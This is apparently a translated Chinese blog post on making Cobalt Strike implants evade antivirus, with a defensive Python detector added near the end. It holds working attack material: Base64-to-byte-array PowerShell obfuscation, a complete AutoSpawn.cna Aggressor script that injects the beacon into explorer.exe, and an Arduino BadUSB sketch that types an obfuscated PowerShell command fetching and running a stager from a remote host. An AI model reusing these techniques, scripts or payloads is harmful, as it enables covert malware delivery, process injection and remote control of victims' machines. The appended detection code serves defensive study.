[CS] Cobalt Strike Malleable C2 configuration and PowerShell AV evasion

Malleable C2 configuration

First of all, I fell into a pit right at the start. Shouldn't CS be something that works out of the box? On reflection, no: if it were, its traffic signature would be plain as day. This is where a Malleable C2 profile comes in.

Malleable Command and Control (extensible command and control)
Malleable C2 is mainly used to control the network parameters of the Cobalt Strike Beacon payload; in other words, it lets us disguise or obfuscate our traffic, which makes it easier to get past firewalls in more complex environments.
There is a GitHub project, Malleable-C2, that contains ready-made profiles, and you can also write your own. I used a profile a senior student had sent me earlier that disguises the traffic as a well-known search engine's.
Without this traffic obfuscation, even if the PowerShell implant generated by CS evades detection, Windows Defender will still kill it when commands are later dispatched.
In the Listener we should also use encrypted HTTPS traffic, which gets through firewalls more easily.

PowerShell AV evasion

First, after studying the generated payload a bit, we found that the FromBase64String function appears to be blacklisted: an alert fires as soon as execution reaches it. So we can convert the Base64 into byte-array form to get around it.
Example:

# Base64
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')
# after conversion to byte arrays: the decoded bytes are split into several [Byte[]] literals with randomly named variables, which are then concatenated back into a single array

There is an automation script on GitHub, MyBypassAV_ps1.py, which not only performs the byte-array conversion but also obfuscates function and variable names with random strings.
After obfuscation it is basically undetected. Why "basically"? Because there is still a chance the AV kills it while it is talking to the C2 (perhaps the traffic signature isn't fully cleaned up), so we want to migrate the process as early as possible (also because someone might notice a black console window and close it).
So in the C2 profile I changed the session sleep time to 200 ms,
and set up a plugin that migrates the process automatically on the very first check-in; all you need to do is load the AutoSpawn.cna file in the Client.
It migrates the process into explorer.exe within the first 200 ms check-in and sets the sleep time of both the old and the new session to 5 s to avoid being noticed.

# AutoSpawn.cna
# Runs once for every new Beacon: find explorer.exe in the process list,
# inject a new session into it, then slow both sessions down to a 5 s sleep.
on beacon_initial
{
    sub callback
    {
        # $1 is the Beacon ID, $2 the tab-separated ps output (name, ppid, pid, ...);
        # the second capture group is the PID of explorer.exe
        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
        $listener = "https";
        if ($2 ismatch $regex)
        {
            # matched() holds the capture groups; index 1 is the (\d+) PID group
            $pid = matched()[1];
            $inject_pid = $pid;
            if (-is64 $1)
            {
                $arch = "x64";
            }
            else
            {
                $arch = "x86";
            }
            # spawn a new session for the "https" listener inside explorer.exe
            binject($1, $pid, $listener, $arch);
            # old session: sleep 5 s with 37% jitter
            bsleep($1, 5, 37);
        }
    }
    # $inject_pid is a global set inside callback; the new Beacon that comes up
    # inside explorer.exe has that PID, so it only gets the slower sleep
    if ($inject_pid != beacon_info($1, "pid"))
    {
        bps($1, &callback);
    }
    else
    {
        bsleep($1, 5, 37);
    }
}

The result is shown in the figure.

That gives us AV evasion plus automatic migration, and the BadUSB can finally be used.

[Close-access] Using a BadUSB

I once saw an article on a WeChat public account about using a BadUSB for close-access (physical) penetration testing, and I had seen many designs of this kind before. Essentially a BadUSB is a microcontroller that emulates a keyboard; by typing malicious commands through that keyboard it can bypass firewalls and quite a few antivirus products.
Designing my own was too much trouble: the chip is available off the shelf, but you also have to buy a case for it and so on. Since this was only for research, I bought a ready-made one on Taobao.
The board I bought is a Leonardo USB ATMEGA32U4; the one with the metal case looks nicer. The main problem with this MCU is that the flash is too small, so anything slightly larger won't fit (although it only needs to hold a shell stager, so there isn't much to write).
The program is written in the Arduino IDE.

The payload here is adapted from one on a WeChat public account, using an alias and ^ (caret) splicing to bypass detection, with a few changes to the code.
The steps become:

Win+M (minimize) -> Win+R (Run) -> press CapsLock -> type CMD -> type the PAYLOAD

Minimizing avoids typing the payload into some other application; CapsLock is mainly there to avoid interference from the Chinese IME.

#include <Keyboard.h>   // Arduino USB HID keyboard library, needed on the Leonardo / ATmega32U4

void setup() {
  Keyboard.begin();
  delay(4500);                    // wait for the host to enumerate the "keyboard"
  Keyboard.press(KEY_LEFT_GUI);   // Win+M: minimize all windows
  delay(200);
  Keyboard.press('m');
  delay(200);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('m');
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);   // Win+R: open the Run dialog
  delay(200);
  Keyboard.press('r');
  Keyboard.press(KEY_CAPS_LOCK);  // toggle CapsLock to keep the Chinese IME out of the way
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500);
  Keyboard.println(F("cmd"));     // launch cmd from the Run dialog
  delay(1000);
  // the payload line: alias for IEX, caret-split tokens and a spliced URL
  Keyboard.println(F("cmd /c echo set-alias -name xz -value IEX;x^z (New-Object \"NeT.WeBClienT\").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://192.16'+'8.239'+'.249'+'/1') | p^o^w^e^r^s^h^e^l^l -"));
  Keyboard.press(KEY_CAPS_LOCK);  // toggle CapsLock back
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop()
{
}

Why is the URL http://192.168.239.249/1, and why is the path /1 a digit rather than a letter?
Because CapsLock may already be on, in which case pressing it again turns it off. Typing still works fine as long as the IME doesn't interfere, but URL paths are case-sensitive, so we use a digit to make sure the path can be reached.
The PowerShell payload here is the CS stager downloaded from the server; after download it runs in memory, which also evades AV.
But that still isn't enough: this gets past Huorong and 360, yet it can't even get past Windows Defender. No idea why.
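The byte-array conversion from the PowerShell section and the alias, caret-splitting and URL-splicing tricks in the BadUSB payload above all leave recognizable traces in script block and process command-line logs. As an added example (not code from the post), a small Python normalizer undoes those tricks and reports the indicators; the sample command line and script are constructed to match the shapes shown above, with a TEST-NET address and dummy bytes in place of the post's real values.

```python
import re

# Constructed sample command line in the shape of the BadUSB payload above:
# an alias for IEX, caret-split cmd tokens, a URL built from '..'+'..' pieces,
# and "| powershell -" to execute from stdin. TEST-NET address, not the post's.
SAMPLE_CMD = (
    "cmd /c echo set-alias -name xz -value IEX;x^z (New-Object \"NeT.WeBClienT\")"
    ".d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://198.51'+'.100.7'+'/1') | p^o^w^e^r^s^h^e^l^l -"
)
# Constructed script in the shape of the byte-array conversion (dummy bytes).
SAMPLE_PS = (
    "[Byte[]]$a = [Byte[]](223,107,160,199,211,203,235,35,35,35)\n"
    "[Byte[]]$b = [Byte[]](168,97,31,107,34,243,69,162,91,59)\n"
    "[Byte[]]$code = $a + $b\n"
)

def normalize_cmd(s: str) -> str:
    """Strip cmd.exe caret escapes, join 'a'+'b' string pieces, lower-case."""
    s = s.replace("^", "")            # cmd drops ^ before the next character
    prev = None
    while prev != s:                  # repeat until no adjacent literals remain
        prev = s
        s = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return s.lower()

def find_indicators(cmd: str) -> list:
    """Return the indicators that become visible once the obfuscation is undone."""
    n = normalize_cmd(cmd)
    hits = []
    if "net.webclient" in n and "downloadstring" in n:
        hits.append("downloadstring")
    m = re.search(r"set-alias\s+-name\s+(\w+)\s+-value\s+iex\b", n)
    if m:
        hits.append("alias-for-iex:" + m.group(1))
        if re.search(r"\b%s\b\s*\(" % re.escape(m.group(1)), n):
            hits.append("alias-invoked")      # the alias is actually called
    if re.search(r"\|\s*powershell\s+-\s*$", n):
        hits.append("powershell-stdin")       # script fed to powershell via stdin
    hits += ["url:" + u for u in re.findall(r"https?://[^\s'\"()]+", n)]
    return hits

def byte_array_literals(script: str) -> dict:
    """Count [Byte[]](n,n,...) literals, total bytes, and chunk concatenation."""
    arrays = re.findall(r"\[byte\[\]\]\s*\(\s*([\d\s,]+)\)", script, re.I)
    total = sum(len(a.split(",")) for a in arrays)
    joined = re.search(r"=\s*\$\w+(?:\s*\+\s*\$\w+)+", script) is not None
    return {"arrays": len(arrays), "bytes": total, "concatenated": joined}
```

Run `find_indicators` over Sysmon event 1 / 4688 command lines and `byte_array_literals` over script block (event 4104) text; a handful of `[Byte[]]` literals concatenated into one buffer is the exact shape the converter above produces.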
Cobalt Strike PowerShell AV evasion
The result is shown in the figure.


Since Windows Defender also seems to monitor traffic (migrating early takes care of that), and a big black window full of commands like that would scare anyone and be closed very quickly, I used a plugin to make it migrate automatically; I'll write about that in more detail in "Cobalt Strike PowerShell AV evasion".
With that, the BadUSB completes its glorious life in close-access pentesting by being thrown into the trash as a broken USB stick.
Using a BadUSB isn't the hard part; the hard part is getting PowerShell AV evasion right.